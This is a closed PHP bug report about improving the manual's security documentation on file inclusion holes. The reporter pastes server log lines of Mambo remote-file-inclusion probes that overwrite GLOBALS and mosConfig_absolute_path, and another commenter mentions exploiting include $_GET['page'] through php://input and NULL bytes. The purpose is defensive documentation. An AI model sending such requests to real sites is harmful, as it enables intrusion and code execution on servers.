ID: 37874 Updated by: [EMAIL PROTECTED] Reported By: Harry dot Boeck at t-online dot de -Status: Assigned +Status: Closed Bug Type: Documentation problem Operating System: all PHP Version: Irrelevant Assigned To: colder New Comment:
This bug has been fixed in the documentation's XML sources. Since the online and downloadable versions of the documentation need some time to get updated, we would like to ask you to be a bit patient. Thank you for the report, and for helping us make our documentation better. some improvements Previous Comments: ------------------------------------------------------------------------ [2006-12-21 06:58:43] mohammedferoz123 at gmail dot com PLEASE SEND SOME SAMPLE TEST CASES OF WEB APPLICATION AND CLIENT SERVER APPLICATION ------------------------------------------------------------------------ [2006-06-23 04:23:47] judas dot iscariote at gmail dot com in my latest comment I really mean "even **without** allow_url_fopen enabled" ------------------------------------------------------------------------ [2006-06-23 04:22:28] judas dot iscariote at gmail dot com your latest comment have nothing to do with allow_url_fopen..looks like that is a combination of a MOS bug with the GLOBALS overwrite issue detected by Steffan Esser some time ago.. adittionally buggy code like include $_GET['page'] can be exploited even with allow_url_fopen , to read local files, or arbitrary code execution tricking the php://input wrapper ( that do not obey allow_url_fopen at all) I think this last point,and the NULL byte attack should be mentioned in the security docs too.. ------------------------------------------------------------------------ [2006-06-22 15:13:24] Harry dot Boeck at t-online dot de Well, when i look at the intrusion attempts on my server, for example (cut off from the log): req:"GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=... req:"GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=... req:"GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=... req:"GET /Mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=... req:"GET /news/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=... req:"GET /home/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=... req:"GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=... req:"GET /index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=... req:"GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=... req:"GET /Mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=... req:"GET /news/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=... req:"GET /home/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=... req:"GET /cvs/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=... then it seems that there are at least _a_few_ people out there not being able to read the "pretty well" documentation while being able to program wide spread public programs versus being able to setup servers. They are, of course, only extremely rare exceptions! OK, i have done all i could to help those guys. If it shouldn't be, then i will let it be. ------------------------------------------------------------------------ [2006-06-22 14:56:15] [EMAIL PROTECTED] It seems that this manual page[1] needs some fixes and is not really up to date. I'll also add something about the "include security hole". [1] http://php.net/security.filesystem ------------------------------------------------------------------------ The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at http://bugs.php.net/37874 -- Edit this bug report at http://bugs.php.net/?id=37874&edit=1